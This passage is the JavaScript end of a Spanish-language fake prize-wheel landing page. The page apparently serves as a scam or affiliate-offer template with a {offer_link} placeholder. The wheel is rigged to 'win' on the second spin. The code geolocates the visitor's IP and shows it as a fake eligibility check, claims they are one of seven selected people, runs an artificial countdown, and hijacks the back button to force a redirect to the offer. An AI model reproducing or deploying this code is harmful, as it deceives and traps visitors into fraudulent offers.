                (conMid = (whCon.getBoundingClientRect().bottom - whCon.getBoundingClientRect().top) / 2), (button.style.top = conMid - button.offsetHeight / 2 - (0.2 * button.offsetHeight) / 2 + "px");
            }

            function spin() {
                console.log("spin");
                var modal = $modal({
                    content: '<p style="text-align:center;">¡Tienes un intento extra!</p><br><p style="text-align:center;">¡Inténtalo de nuevo!</p>',
                });
                switch (count) {
                    case 1:
                        (button.disabled = !0),
                            (dWheel.className = "spinAround"),
                            setTimeout(function () {
                                (button.disabled = !1),
                                    modal.show(),
                                    $(".modal__btn-close").click(function () {
                                        autospin2();
                                    });
                            }, 6800);
                        break;
                    case 2:
                        (dWheel.className = "spinAround2"),
                            setTimeout(function () {
                                dWheel.className = dWheel.className + " transparent";
                            }, 6800),
                            setTimeout(function () {
                                (device.style.display = "block"), (device.style.left = whCon.offsetWidth / 2 - device.offsetWidth / 2 + "px"), (device.style.top = conMid - device.offsetHeight / 2 + "px");
                            }, 7000),
                            setTimeout(function () {
                                (first.innerHTML = "<img src='images/loading.gif'>"),
                                    (first.style.padding = "195px 0px"),
                                    setTimeout(function () {
                                        first.parentNode.removeChild(first), (second.style.display = "block"), con.insertBefore(second, con.firstChild), setInterval("countdown()", 1000);
                                    }, 1500);
                            }, 9000);
                        document.getElementById("my-canvas").remove();
                }
                count++;
            }

            function autospin2() {
                console.log("autospin2");
                spin();
            }

            function autospin1() {
                console.log("autopspin1");
                checkIP()
                    .then((result) => {
                        //console.log('checkIP',result)
                        $("input[name=ip]").val(result.ip);
                        $("input[name=country]").val(result.country);
                        $("input[name=city]").val(result.city);
                        return result;
                    })
                    .catch(function (err) {
                        console.log("Error:", err);
                    })
                    .finally(function () {
                        showModal_1();
                    });
                async function checkIP() {
                    return fetch("https://get.geojs.io/v1/ip/geo.json").then((response) => response.json());
                }

                function deviceType() {
                    ///*TEST*/return "desktop"; //TEST;
                    return "Smartphone";
                }

                function showModal_1() {
                    var modal = $modal({
                        content: `<p style="text-align:center;">¡Felicidades!</p><br>
                <p id="ip_text" style="text-align:center; font-size: 13px;"><b>IP: ${$("input[name=ip]").val()}</b>
                <img id="ip_check" src="images/check_icon.png" width="10" height="10"" alt="check"></p>
                <br><p id="device_text" style="text-align:center; font-size: 13px;"><b>Dispositivo: ${deviceType()}</b>
                <img id="device_check" src="images/check_icon.png" width="10" height="10"" alt="check"></p>
                <br><p id="browser_text" style="text-align:center; font-size: 13px;"><b>Ubicación: ${$("input[name=country]").val() + " " + $("input[name=city]").val()}</b>
                <img id="browser_check" src="images/check_icon.png" width="10" height="10"" alt="check"></p>
                <br><p style="text-align:center;">¡Eres una de las 7 personas seleccionadas para participar en nuestro programa de fidelidad! ¡Puedes conseguir 1 regalo de cada 4!</p>
                <br> <p style="text-align:center;">¡Haz clic en "OK" para empezar!</p>`,
                    });
                    modal.show();
                    $("#ip_text").show("slow");
                    setTimeout(function () {
                        $("ip_text").hide("slow");
                    }, 500);
                    $("#device_text").show("slow");
                    setTimeout(function () {
                        $("device_text").hide("slow");
                    }, 1000);
                    $("#browser_text").show("slow");
                    setTimeout(function () {
                        $("browser_text").hide("slow");
                    }, 3000);
                    $("#loc_text").show("slow");
                    setTimeout(function () {
                        $("loc_text").hide("slow");
                    }, 3500);
                    $("#os_text").show("slow");
                    setTimeout(function () {
                        $("os_text").hide("slow");
                    }, 4500);
                    setTimeout(function () {
                        $("#ip_check").fadeIn(100);
                    }, 1500);
                    setTimeout(function () {
                        $("#device_check").fadeIn(100);
                    }, 2000);
                    setTimeout(function () {
                        $("#browser_check").fadeIn(100);
                    }, 4000);
                    setTimeout(function () {
                        $("#loc_check").fadeIn(100);
                    }, 4500);
                    setTimeout(function () {
                        $("#os_check").fadeIn(100);
                    }, 5100);
                    $(".modal__btn-close").click(function () {
                        document.getElementById("pressButton").click();
                    });
                }
            }

            function countdown() {
                var d = parseInt(document.getElementById("mins").innerHTML),
                    c = parseInt(document.getElementById("hsecs").innerHTML),
                    b = 0,
                    a = 0;
                0 !== d && 0 === c ? ((b = d - 1), (a = 59)) : 0 !== d || 0 !== c ? ((b = d), (a = c - 1)) : 0 === d && 0 === c && ((b = d), (a = c)),
                    a < 10 && (a = "0" + a),
                    (document.getElementById("mins").textContent = b),
                    (document.getElementById("hsecs").textContent = a);
            }
        </script>
        <script type="text/javascript">
            history.pushState(null, document.title, location.href);
            window.addEventListener("popstate", function (event) {
                if (document.URL.indexOf("/#!back") >= 0) {
                    history.replaceState(null, document.title, location.href);
                    window.onbeforeunload = function () {};
                    location.href = "{offer_link}";
                }
                history.pushState(null, document.title, location.href);
                location.href = "{offer_link}";
            });
        </script>
    </body>
</html>
